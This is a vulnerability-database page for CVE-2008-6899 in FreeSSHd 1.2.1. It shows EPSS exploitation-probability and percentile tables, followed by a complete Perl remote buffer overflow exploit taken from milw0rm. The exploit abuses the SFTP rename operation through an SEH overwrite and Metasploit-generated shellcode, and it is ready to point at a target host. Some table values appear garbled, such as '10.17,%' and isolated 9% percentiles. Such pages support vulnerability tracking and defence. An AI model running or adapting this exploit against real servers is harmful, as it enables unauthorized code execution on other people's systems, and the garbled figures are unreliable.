CVE-2008-6899 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	5.71%	–	–
2022-04-03	–	–	5.71%	–	–
2022-05-29	–	–	5.71%	–	–
2023-03-12	–	–	–	3.99%	–
2023-04-02	–	–	–	2.87%	–
2023-06-25	–	–	–	4.02%	–
2023-08-13	–	–	–	6.14%	–
2023-09-24	–	–	–	5.41%	–
2023-11-12	–	–	–	7.13%	–
2023-12-24	–	–	–	2.22%	–
2024-02-11	–	–	–	2.22%	–
2024-06-02	–	–	–	2.22%	–
2024-06-16	–	–	–	2.22%	–
2024-12-22	–	–	–	3.11%	–
2025-01-19	–	–	–	3.11%	–
2025-03-18	–	–	–	–	9.59%
2025-03-30	–	–	–	–	10.17%
2025-04-15	–	–	–	–	10.17%
2025-04-15	–	–	–	–	10.17,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	77%
2022-04-03	89%
2022-05-29	9%
2023-03-12	91%
2023-04-02	89%
2023-06-25	91%
2023-08-13	93%
2023-09-24	92%
2023-11-12	93%
2023-12-24	88%
2024-02-11	89%
2024-06-02	89%
2024-06-16	9%
2024-12-22	91%
2025-01-19	91%
2025-03-18	92%
2025-03-30	92%
2025-04-15	93%
2025-04-15	93%

# FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit # # Advisory: http://www.bmgsec.com.au/advisory/45/ # Original: http://www.bmgsec.com.au/advisory/32/ # Related : http://www.bmgsec.com.au/advisory/42/ # # Test box: WinXP Pro SP2 English # # Exploit code for a vulnerability I discovered sometime # ago in FreeSSHd 1.2.1. This code should be run from a # user titled "root", or adjust the payload for your # username. I've left space for adjustments. Up to the # first six NOPs can be used (inclusive). # # The code exploits a vulnerability in the SFTP Rename # operation. The vulnerability was patched in 1.2.2 # # 00416F98 50 PUSH EAX # 00416F99 8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-148] # 00416F9F 50 PUSH EAX # 00416FA0 E8 45B50400 CALL <JMP.&MSVCRT.strcpy> # # # Written and discovered by: # r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) use Net::SSH2; my $user = "root"; my $pass = "yahh"; my $ip = "127.0.0.1"; my $port = 22; my $ssh2 = Net::SSH2->new(); print "[+] Connecting...\n"; $ssh2->connect($ip, $port) || die "[-] Unable to connect!\n"; $ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n"; print "[+] Sending payload\n"; $nop = "\x90"; $padding = 'A' x 105; my $SEH = "\x21\x11\x40\x00"; # pop, pop, ret - 0x00401121 (Universal - freeSSHdServer.exe) my $nextSEH = "\xEB\xF0\x90\x90"; # jmp short 240, nop, nop $mShellcode = "\xE9\xF2\xFE\xFF\xFF"; # win32_exec - EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub - metasploit.com my $shellcode = "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02". "\x28\x29\x10\x83\xeb\xfc\xe2\xf4\xfe\xc0\x6d\x10\x02\x28\xa2\x55". "\x3e\xa3\x55\x15\x7a\x29\xc6\x9b\x4d\x30\xa2\x4f\x22\x29\xc2\x59". "\x89\x1c\xa2\x11\xec\x19\xe9\x89\xae\xac\xe9\x64\x05\xe9\xe3\x1d". "\x03\xea\xc2\xe4\x39\x7c\x0d\x14\x77\xcd\xa2\x4f\x26\x29\xc2\x76". "\x89\x24\x62\x9b\x5d\x34\x28\xfb\x89\x34\xa2\x11\xe9\xa1\x75\x34". "\x06\xeb\x18\xd0\x66\xa3\x69\x20\x87\xe8\x51\x1c\x89\x68\x25\x9b". "\x72\x34\x84\x9b\x6a\x20\xc2\x19\x89\xa8\x99\x10\x02\x28\xa2\x78". "\x3e\x77\x18\xe6\x62\x7e\xa0\xe8\x81\xe8\x52\x40\x6a\x56\xf1\xf2". "\x71\x40\xb1\xee\x88\x26\x7e\xef\xe5\x4b\x48\x7c\x61\x28\x29\x10"; my $payload = $nop x 6 . $shellcode . $padding . $mShellcode . $nop x 9 . $nextSEH . $SEH; my $sftp = $ssh2->sftp(); $sftp->rename($payload, 'B'); print "[+] Sent"; $ssh2->disconnect; # milw0rm.com [2009-03-27]